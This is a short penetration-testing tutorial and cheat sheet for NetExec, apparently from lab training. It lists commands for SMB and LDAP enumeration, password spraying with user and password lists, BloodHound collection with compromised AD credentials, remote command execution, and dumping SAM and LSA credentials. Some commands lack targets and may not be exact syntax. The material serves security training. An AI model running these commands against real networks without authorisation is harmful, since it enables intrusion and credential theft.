Going down the range.
So lets discuss a bit about NetExec (formally CrackMapExec....but we use NetExec now).
The more targeted your user/pass or hash list - the more targeted your attack.
This tool is the go-to tool for internal engagements when performing large sweeps or 'Credential Spray' Attacks across a variety of protocols.
sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
I encourage you to do some research on what protocols NetExec supports!
Enumerate Hosts:
- Use to identify live hosts and their SMB details on a network.
nxc smb
Enumerate Null Sessions:
- Check if a host allows null sessions, which can be useful for further enumeration.
nxc smb --null-session
Enumerate Active Sessions:
- List active SMB sessions on a target host.
nxc smb --sessions
Enumerate Shares and Access:
- List all available shares and permissions.
nxc smb -u Username -p 'PASSWORD' --shares
Enumerate Domain Users:nxc smb -u Username -p 'PASSWORD' --domain-users
Retrieve domain users for further analysis.
S1REN, I've compromised a machine on the internal network and managed to get a real AD User.
What do?
Glad you asked.
Search for the Domain Controller first, enumerate it out by checking for LDAP protocol. Then, once firmly identified - utilize your compromised AD Creds along side NetExec with Bloodhound-Python.
NetExec ldap <ip> -u ad-user -p ad-pass --bloodhound -ns <ns-ip> --collection All
If successful - you will get a bunch of JSON output files that can be imported into the Bloodhound GUI.
# SMB Enumeration
nxc smb <target> --shares
nxc smb <target> --sessions
nxc smb <target> --null-session
nxc smb <target> --guest-logon
nxc smb <target> --interfaces
# LDAP Enumeration
nxc ldap <target> --users
nxc ldap <target> --subnet
nxc ldap <target> --domain-trusts
# Password Spraying (Supported protocols: SMB, WINRM, SSH, etc.)
nxc <protocol> <target> -u <username> -p <password>
nxc <protocol> <target> -u <file_with_users> -p <file_with_passwords> --no-bruteforce
# Command Execution (Supported on protocols like SMB, WINRM, MSSQL, etc.)
nxc <protocol> <target> --exec <command>
# Dumping credentials
nxc smb <target> --dump-sam
nxc smb <target> --dump-lsa
# Brute-force and Credential Checks
nxc <protocol> <target> -u <username> -p <password> --continue-on-success
nxc <protocol> <target> -u <file_with_users> -p <file_with_passwords> --no-bruteforce
# Scan for vulnerabilities
nxc smb <target> --vuln-scan
# Additional Examples
nxc smb <target> --domain-users
nxc smb <target> --domain-password-policy
nxc ldap <target> --find-sid
nxc ldap <target> --check-signing
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